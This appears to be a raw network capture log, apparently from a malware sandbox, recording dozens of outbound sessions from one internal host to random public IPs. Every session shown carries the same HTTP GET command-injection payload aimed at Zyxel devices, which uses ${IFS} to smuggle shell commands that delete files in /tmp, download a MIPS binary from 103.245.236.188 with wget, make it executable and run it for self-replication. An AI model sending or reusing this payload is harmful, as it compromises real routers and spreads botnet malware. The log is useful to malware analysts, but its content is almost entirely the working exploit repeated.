                                    Jan 13, 2024 19:02:32.124555111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3838192.168.2.134902865.47.121.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.124589920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3839192.168.2.133637442.118.253.198443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.124686956 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3840192.168.2.1353990101.192.7.161443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.124706030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3841192.168.2.134135612.117.193.129443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.124756098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3842192.168.2.1344460163.34.208.85443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.124797106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3843192.168.2.135806080.94.127.220443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.124814987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3844192.168.2.1337150167.20.202.43443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.124849081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3845192.168.2.133615212.222.54.154443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.124933958 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3846192.168.2.1358498139.143.228.250443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.124964952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3847192.168.2.1356156213.43.142.175443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.124970913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3848192.168.2.134896831.66.238.64443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.124964952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3849192.168.2.133314285.237.148.248443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.125045061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3850192.168.2.1346034164.201.112.216443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.125052929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3851192.168.2.1349824165.200.49.6443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.125117064 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3852192.168.2.1347118188.185.51.171443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.125210047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3853192.168.2.1345330173.234.53.185443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.125243902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3854192.168.2.1345170111.34.65.249443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.125261068 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3855192.168.2.1337654154.206.125.166443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.125305891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3856192.168.2.134991827.108.91.70443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.125360012 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3857192.168.2.1356558151.34.45.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.125387907 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3858192.168.2.135495273.220.118.213443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.125461102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3859192.168.2.1335480153.187.48.124443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.125467062 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3860192.168.2.1344168110.186.34.60443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.125462055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3861192.168.2.1340366100.178.227.213443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.125515938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3862192.168.2.133609035.163.141.230443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.125543118 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3863192.168.2.134354441.98.156.14443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.125570059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3864192.168.2.1341470179.216.60.91443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.125634909 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3865192.168.2.1335144171.199.90.84443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.125669003 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3866192.168.2.133616818.184.155.38443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.125725985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3867192.168.2.1345906113.84.186.173443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.125760078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3868192.168.2.134310667.216.50.163443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.125813961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3869192.168.2.134073820.191.185.132443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.125860929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3870192.168.2.134428288.192.118.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.125909090 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3871192.168.2.135265662.187.37.227443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.125926018 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3872192.168.2.133584619.3.75.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.125951052 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3873192.168.2.1337618189.38.38.166443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.125989914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3874192.168.2.134804864.121.230.124443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.126048088 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3875192.168.2.1354088178.131.92.39443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.126066923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3876192.168.2.1332850136.226.38.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.126111984 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3877192.168.2.1353906111.211.174.210443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.126168966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3878192.168.2.1339760130.60.208.158443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.126197100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3879192.168.2.1333508180.24.44.3443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.126246929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3880192.168.2.136068643.169.205.0443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.126306057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3881192.168.2.1354454181.11.184.40443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.126338959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3882192.168.2.135611459.28.232.25443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.126386881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3883192.168.2.1355284107.46.118.94443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.126421928 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3884192.168.2.134481054.184.72.135443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.126466990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3885192.168.2.1353136114.185.99.120443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.126504898 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3886192.168.2.1341786143.167.106.250443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.126538038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3887192.168.2.136099871.92.137.54443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.126588106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3888192.168.2.1335936135.186.85.232443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.126616001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3889192.168.2.1360628184.118.233.236443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.126662970 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3890192.168.2.1344588102.123.220.182443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.126703978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3891192.168.2.1345426151.112.172.23443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.126775026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3892192.168.2.1337418223.116.230.114443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.126780033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3893192.168.2.135606289.34.28.168443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.126837015 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3894192.168.2.1346896130.145.170.111443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.126846075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3895192.168.2.1337790165.152.30.231443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.126893997 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3896192.168.2.1342392123.66.15.116443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.126920938 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3897192.168.2.1339930108.249.27.218443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.126960039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3898192.168.2.1351022189.122.197.38443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.127000093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3899192.168.2.134752223.20.29.30443
                                    TimestampBytes transferredDirectionData
                                    Jan 13, 2024 19:02:32.127041101 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.188/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                    Session IDSource IPSource PortDestination IPDestination Port
                                    3900192.168.2.1350924196.12.250.74443
                                    TimestampBytes transferredDirectionData
